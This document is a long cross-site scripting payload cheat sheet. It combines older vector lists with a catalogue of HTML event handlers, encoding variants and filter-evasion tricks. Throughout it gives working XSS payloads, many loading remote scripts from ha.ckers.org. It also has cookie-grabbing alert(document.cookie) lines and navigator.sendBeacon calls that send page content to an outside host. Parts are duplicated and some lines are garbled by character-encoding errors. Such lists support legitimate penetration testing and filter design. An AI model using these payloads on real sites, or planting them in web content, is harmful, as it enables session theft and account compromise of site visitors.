<BODY BACKGROUND=\"javascript:alert('XSS')\">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC=\"javascript:alert('XSS')\">

<IMG LOWSRC=\"javascript:alert('XSS')\">

<BGSOUND SRC=\"javascript:alert('XSS');\">

<BR SIZE=\"&{alert('XSS')}\">

<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></
LAYER>

<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">

<LINK REL=\"stylesheet\"
HREF=\"http://ha.ckers.org/xss.css\">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css>;
REL=stylesheet\">

<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/
xssmoz.xml#xss\")}</STYLE>

<XSS STYLE=\"behavior: url(xss.htc);\">

<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

<IMG SRC='vbscript:msgbox(\"XSS\")'>

<IMG SRC=\"mocha:[code]\">

<IMG SRC=\"livescript:[code]\">

žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
K\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;

URL=http://;URL=javascript:alert('XSS');\"

<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>

<FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET>

<TABLE BACKGROUND=\"javascript:alert('XSS')\">

<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">

<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">

<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">

<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">

<DIV STYLE=\"width: expression(alert('XSS'));\">

<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>

<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">

<XSS STYLE=\"xss:expression(alert('XSS'))\">

exp/*<A STYLE='no\xss:noxss(\"*//*\");

xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>

<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>

<STYLE>.XSS{background-
image:url(\"javascript:alert('XSS')\");}</STYLE><A
CLASS=XSS></A>

<STYLE
type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}&l
t;/STYLE>

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

<BASE HREF=\"javascript:alert('XSS');//\">

<OBJECT TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS')></OBJECT>

<EMBED SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED>

<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>

a=\"get\";

b=\"URL(\\"\";

c=\"javascript:\";

d=\"alert('XSS');\\")\";

eval(a+b+c+d);

<HTML xmlns:xss><?import namespace=\"xss\"

implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss
>XSS</xss:xss></HTML>

<XML ID=I><X><C><![CDATA[<IMG
SRC=\"javas]]><!
[CDATA[cript:alert('XSS');\">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C

DATAFORMATAS=HTML></SPAN>

<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- --

>cript:alert('XSS')\"></B></I></XML>

<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>

<XML SRC=\"xsstest.xml\" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>

<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-

com:time\">

<?import namespace=\"t\" implementation=\"#default#time2\">

<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT

DEFER>alert("XSS")</SCRIPT>\">

</BODY></HTML>

<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>

<!--#exec cmd=\"/bin/echo 'IPT

SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->

<? echo('<SCR)';

echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>

<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html;

charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT =\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">\" ''

SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT \"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=`>`
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<A HREF=\"http://66.102.7.147/\">XSS</A>

<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</
A>

<A HREF=\"http://1113982867/\">XSS</A>

<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>

<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>

<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>

<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>

<A HREF=\"http://ha.ckers.org@google\">XSS</A>

<A HREF=\"http://google:ha.ckers.org\">XSS</A>

<A HREF=\"http://google.com/\">XSS</A>

<A HREF=\"http://www.google.com./\">XSS</A>

<A
HREF=\"javascript:document.location='http://www.google.com/'
\">XSS</A>

<A
HREF=\"http://www.gohttp://www.google.com/ogle.com/\">
XSS</A>

<

%3C

&lt

<

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060
<

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

<

<

<

<

<

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;
&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

<

<

<

<

<

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C
&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

<iframe src=http://ha.ckers.org/scriptlet.html>

<IMG SRC=\"javascript:alert('XSS')\"

<SCRIPT SRC=//ha.ckers.org/.js>

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

<<SCRIPT>alert(\"XSS\");//<</SCRIPT>

<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>

<SCRIPT/XSS
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<IMG SRC=\" javascript:alert('XSS');\">

perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out

<IMG SRC=\"javascript:alert('XSS');\">

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=\"jav	ascript:alert('XSS');\">

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#
x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#000
0112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#000
0039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">

<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=\"javascript:alert('XSS');\">

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

'';!--\"<XSS>=&{()}

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,8
3,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCha
rCode(88,83,83))//--></
SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//
--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascrscriptipt:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC="  javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<XSS STYLE="xss:expression(alert('XSS'))">

exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?

import namespace="t" implementation="#default#time2"><t:set
attributeName="innerHTML" to="XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<form id="test" /><button form="test"

formaction="javascript:alert(123)">TESTHTML5FORMACTION

<form><button formaction="javascript:alert(123)">crosssitespt

<frameset onload=alert(123)>

<img src=x onerror=alert(123)//">

<style><img src="</style><img src=x onerror=alert(123)//">

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

<embed src="javascript:alert(1)">

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

<script>({0:#0=alert/#0#/#0#(123)})</script>

<script>ReferenceError.prototype.__defineGetter__('name', function()
{alert(123)}),x</script>

<script>Object.__noSuchMethod__ =
Function,[{}][0].constructor._('alert(1)')()</script>

<script src="#">{alert(1)}</script>;1

<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-
use')</script>

<svg xmlns="#"><script>alert(1)</script></svg>

<svg onload="javascript:alert(123)" xmlns="#"></svg>

<iframe xmlns="#" src="javascript:alert(1)"></iframe>

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>

foo<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://
my.box.com/xss.js%3E%3C/script%3E%22)’%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert(’XSS’)>

<script>alert(1)</script>

"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

<video src=1 onerror=alert(1)>

<audio src=1 onerror=alert(1)> <xss id=x tabindex=1 onactivate=alert(1)></xss>

Compatibility:

onafterprint
Fires after the page is printed

<body onafterprint=alert(1)>

Compatibility:

onafterscriptexecute
Fires after script is executed

<xss
onafterscriptexecute=alert(1)><script>1</script>

Compatibility:

onanimationcancel
Fires when a CSS animation cancels

<style>@keyframes
x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x
style="position:absolute;" onanimationcancel="alert(1)"></xss>

Compatibility:

onanimationend
Fires when a CSS animation ends

<style>@keyframes
x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>

Compatibility:

onanimationiteration
Fires when a CSS animation repeats

<style>@keyframes
slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-
count:2" onanimationiteration="alert(1)"></xss>

Compatibility:

onanimationstart
Fires when a CSS animation starts

<style>@keyframes
x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>

Compatibility:

onbeforeactivate
Fires before the element is activated

<xss id=x tabindex=1

onbeforeactivate=alert(1)></xss>

Compatibility:

onbeforedeactivate
Fires before the element is deactivated

<xss id=x tabindex=1

onbeforedeactivate=alert(1)></xss><input autofocus>

Compatibility:

onbeforeprint
Fires before the page is printed

<body onbeforeprint=alert(1)>

Compatibility:

onbeforescriptexecute
Fires before script is executed

<xss
onbeforescriptexecute=alert(1)><script>1</script>

Compatibility:

onbeforeunload
Fires after if the url changes

<body
onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>

Compatibility:

onbegin
Fires when a svg animation begins

<svg><animate onbegin=alert(1)
attributeName=x dur=1s>

Compatibility:

onblur
Fires when an element loses focus

<a onblur=alert(1)
tabindex=1 id=x></a><input autofocus>

Compatibility:

onbounce
Fires when the marquee bounces

<marquee width=1 loop=1

onbounce=alert(1)>XSS</marquee>

Compatibility:
oncanplay
Fires if the resource can be played

<audio oncanplay=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through

<video
oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>

Compatibility:

oncuechange
Fires when subtitle changes

<video controls><source
src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1)
src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>

Compatibility:

ondeactivate
Fires when the element is deactivated

<xss id=x tabindex=1

ondeactivate=alert(1)></xss><input id=y autofocus>

Compatibility:

ondurationchange
Fires when duration changes

<audio controls ondurationchange=alert(1)><source src=validaudio.mp3

type=audio/mpeg></audio>
Compatibility:

onend
Fires when a svg animation ends

<svg><animate onend=alert(1) attributeName=x dur=1s>

Compatibility:

onended
Fires when the resource is finished playing

<audio controls autoplay onended=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onerror
Fires when the resource fails to load or causes an error

<audio src/onerror=alert(1)>

Compatibility:

onfinish
Fires when the marquee finishes

<marquee width=1 loop=1

onfinish=alert(1)>XSS</marquee>

Compatibility:

onfocus
Fires when the element has focus

<a id=x tabindex=1 onfocus=alert(1)></a>

Compatibility:

onfocusin
Fires when the element has focus

<a id=x tabindex=1 onfocusin=alert(1)></a>

Compatibility:

onfocusout
Fires when an element loses focus

<a onfocusout=alert(1)
tabindex=1 id=x></a><input autofocus>

Compatibility:

onhashchange
Fires if the hash changes

<body onhashchange="alert(1)">

Compatibility:

onload
Fires when the element is loaded

<body onload=alert(1)>

Compatibility:

onloadeddata
Fires when the first frame is loaded

<audio onloadeddata=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onloadedmetadata
Fires when the meta data is loaded

<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onloadend
Fires when the element finishes loading

<image src=validimage.png onloadend=alert(1)>

Compatibility:

onloadstart
Fires when the element begins to load

<image src=validimage.png onloadstart=alert(1)>

Compatibility:

onmessage
Fires when message event is received from a postMessage call

<body onmessage=alert(1)>

Compatibility:

onpageshow
Fires when the page is shown

<body onpageshow=alert(1)>

Compatibility:

onplay
Fires when the resource is played

<audio autoplay onplay=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

Compatibility:

onplaying
Fires the resource is playing

<audio autoplay onplaying=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onpopstate
Fires when the history changes

<body onpopstate=alert(1)>

Compatibility:

onprogress
Fires when the video/audio begins downloading

<audio controls onprogress=alert(1)><source src=validaudio.mp3

type=audio/mpeg></audio>

Compatibility:

onreadystatechange
Fires when the ready state changes

<applet
onreadystatechange=alert(1)></applet>

Compatibility:

onrepeat
Fires when a svg animation repeats

<svg><animate onrepeat=alert(1) attributeName=x dur=1s

repeatCount=2 />

Compatibility:

onresize
Fires when the window is resized

<body onresize="alert(1)">

Compatibility:

onscroll
Fires when the page scrolls

<body onscroll=alert(1)><div
style=height:1000px></div><div id=x></div>
Compatibility:

onstart
Fires when the marquee starts

<marquee
onstart=alert(1)>XSS</marquee>

Compatibility:

ontimeupdate
Fires when the timeline is changed

<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

ontoggle
Fires when the details tag is expanded

<details ontoggle=alert(1)
open>test</details>

Compatibility:

ontransitioncancel
Fires when a CSS transition cancels

<style>:target {color:
red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>

Compatibility:

ontransitionend
Fires when a CSS transition ends

<style>:target
{color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>

Compatibility:

ontransitionrun
Fires when a CSS transition begins

<style>:target
{transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s"
ontransitionrun=alert(1)></xss>

Compatibility:

ontransitionstart
Fires when a CSS transition starts

<style>:target
{color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>

Compatibility:

onunhandledrejection
Fires when a promise isn't handled

<body
onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
Compatibility:

onunload
Fires when the page is unloaded

<body onunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>

Compatibility:

onwaiting
Fires when while waiting for the data

<video autoplay controls

onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>

Compatibility:

onwebkitanimationend
Fires when a CSS animation ends

<style>@keyframes
x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>

Compatibility:

onwebkitanimationiteration
Fires when a CSS animation repeats

<style>@keyframes
slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-
count:2" onwebkitanimationiteration="alert(1)"></xss>

Compatibility:

onwebkitanimationstart
Fires when a CSS animation starts

<style>@keyframes
x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>

Compatibility:

onwebkittransitionend
Fires when a CSS transition ends

<style>:target
{color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>

Compatibility:

Event handlers that do require user interaction

Event:
Description:
Tag:
Code:
Copy:
onauxclick
Fires when right clicking or using the middle button of the mouse

<input onauxclick=alert(1)>

Compatibility:
onbeforecopy
Requires you copy a piece of text

<a onbeforecopy="alert(1)" contenteditable>test</a>

Compatibility:
onbeforecut
Requires you cut a piece of text

<a onbeforecut="alert(1)" contenteditable>test</a>

Compatibility:

onbeforepaste
Requires you paste a piece of text

<a onbeforepaste="alert(1)" contenteditable>test</a>

Compatibility:

onchange
Requires as change of value

<input onchange=alert(1) value=xss>

Compatibility:

onclick
Requires a click of the element

<xss
onclick="alert(1)">test</xss>

Compatibility:

onclose
Fires when a dialog is closed

<dialog open onclose=alert(1)><form

method=dialog><button>XSS</button></form>

Compatibility:

oncontextmenu
Triggered when right clicking to show the context menu

<xss
oncontextmenu="alert(1)">test</xss>

Compatibility:

oncopy
Requires you copy a piece of text

<xss oncopy=alert(1)
value="XSS" autofocus tabindex=1>test

Compatibility:

oncut
Requires you cut a piece of text

<xss oncut=alert(1)
value="XSS" autofocus tabindex=1>test

Compatibility:

ondblclick
Triggered when double clicking the element

<xss
ondblclick="alert(1)" autofocus tabindex=1>test</xss>

Compatibility:

ondrag
Triggered dragging the element

<xss draggable="true"
ondrag="alert(1)">test</xss>

Compatibility:

ondragend
Triggered dragging is finished on the element

<xss draggable="true"
ondragend="alert(1)">test</xss>

Compatibility:

ondragenter
Requires a mouse drag

<xss draggable="true"
ondragenter="alert(1)">test</xss>

Compatibility:

ondragleave
Requires a mouse drag

<xss draggable="true"
ondragleave="alert(1)">test</xss>

Compatibility:

ondragover
Triggered dragging over an element

<div draggable="true"
contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>

Compatibility:

ondragstart
Requires a mouse drag

<xss draggable="true"
ondragstart="alert(1)">test</xss>

Compatibility:

ondrop
Triggered dropping a draggable element

<div draggable="true"
contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>

Compatibility:

onfullscreenchange
Fires when a video changes full screen status

<video onfullscreenchange=alert(1)
src=validvideo.mp4 controls>

Compatibility:

oninput
Requires as change of value

<input oninput=alert(1) value=xss>

Compatibility:

oninvalid
Requires a form submission with an element that does not satisfy its constraints
such as a required attribute.

<form><input oninvalid=alert(1) required><input type=submit>

Compatibility:

onkeydown
Triggered when a key is pressed

<xss
onkeydown="alert(1)" contenteditable>test</xss>

Compatibility:

onkeypress
Triggered when a key is pressed

<xss
onkeypress="alert(1)" contenteditable>test</xss>

Compatibility:

onkeyup
Triggered when a key is released

<xss onkeyup="alert(1)"
contenteditable>test</xss>

Compatibility:

onmousedown
Triggered when the mouse is pressed

<xss
onmousedown="alert(1)">test</xss>

Compatibility:

onmouseenter
Triggered when the mouse is hovered over the element

<xss
onmouseenter="alert(1)">test</xss>

Compatibility:

onmouseleave
Triggered when the mouse is moved away from the element

<xss
onmouseleave="alert(1)">test</xss>

Compatibility:

onmousemove
Requires mouse movement

<xss
onmousemove="alert(1)">test</xss>

Compatibility:

onmouseout
Triggered when the mouse is moved away from the element

<xss
onmouseout="alert(1)">test</xss>

Compatibility:

onmouseover
Requires a hover over the element

<xss
onmouseover="alert(1)">test</xss>

Compatibility:

onmouseup
Triggered when the mouse button is released

<xss
onmouseup="alert(1)">test</xss>

Compatibility:

onmousewheel
Fires when the mousewheel scrolls

<xss
onmousewheel=alert(1)>requires scrolling

Compatibility:

onmozfullscreenchange
Fires when a video changes full screen status

<video onmozfullscreenchange=alert(1)
src=validvideo.mp4 controls>

Compatibility:

onpagehide
Fires when the page is changed

<body
onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>

Compatibility:

onpaste
Requires you paste a piece of text

<a onpaste="alert(1)" contenteditable>test</a>

Compatibility:

onpause
Requires clicking the element to pause

<audio autoplay controls onpause=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onpointerdown
Fires when the mouse down

<xss
onpointerdown=alert(1)>XSS</xss>

Compatibility:

onpointerenter
Fires when the mouseenter

<xss
onpointerenter=alert(1)>XSS</xss>

Compatibility:

onpointerleave
Fires when the mouseleave

<xss
onpointerleave=alert(1)>XSS</xss>

Compatibility:

onpointermove
Fires when the mouse move

<xss
onpointermove=alert(1)>XSS</xss>

Compatibility:

onpointerout
Fires when the mouse out

<xss
onpointerout=alert(1)>XSS</xss>

Compatibility:

onpointerover
Fires when the mouseover

<xss
onpointerover=alert(1)>XSS</xss>

Compatibility:

onpointerrawupdate
Fires when the pointer changes

<xss
onpointerrawupdate=alert(1)>XSS</xss>

Compatibility:

onpointerup
Fires when the mouse up

<xss
onpointerup=alert(1)>XSS</xss>

Compatibility:

onreset
Requires a click

<form onreset=alert(1)><input
type=reset>
Compatibility:

onsearch
Fires when a form is submitted and the input has a type attribute of search

<form><input type=search
onsearch=alert(1) value="Hit return" autofocus>

Compatibility:

onseeked
Requires clicking the element timeline

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onseeking
Requires clicking the element timeline

<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onselect
Requires you select text

<input onselect=alert(1) value="XSS" autofocus>

Compatibility:

onselectionchange
Fires when text selection is changed on the page

<body onselectionchange=alert(1)>select
some text

Compatibility:

onselectstart
Fires when beginning a text selection

<body onselectstart=alert(1)>select some

text

Compatibility:

onshow
Fires context menu is shown

<div contextmenu=xss><p>Right
click<menu type=context id=xss onshow=alert(1)></menu></div>

Compatibility:

onsubmit
Requires a form submission

<form onsubmit=alert(1)><input
type=submit>
Compatibility:

ontouchend
Fires when the touch screen, only mobile device

<body ontouchend=alert(1)>

Compatibility:

ontouchmove
Fires when the touch screen and move, only mobile device

<body ontouchmove=alert(1)>

Compatibility:

ontouchstart
Fires when the touch screen, only mobile device

<body ontouchstart=alert(1)>

Compatibility:

onvolumechange
Requires volume adjustment

<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav"

type="audio/wav"></audio>

Compatibility:

onwheel
Fires when you use the mouse wheel

<body onwheel=alert(1)>

Compatibility:

Restricted characters
No parentheses using exception handling
<script>onerror=alert;throw 1</script>

No parentheses using exception handling no semi colons

<script>{onerror=alert}throw 1</script>

No parentheses using exception handling no semi colons using expressions

<script>throw onerror=alert,1</script>

No parentheses using exception handling and eval

<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\
x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval without .

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect

<script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect no strings

<script>location=name</script>

No parentheses using template strings

<script>alert`1`</script>

No parentheses using template strings and location hash

<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces, using template strings and location hash

<script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks
Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event

<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss
class=carousel-inner><xss class="carousel-item active"></xss><xss
class=carousel-item></xss></xss></xss>

Protocols
Iframe src attribute JavaScript protocol
<iframe src="javascript:alert(1)">

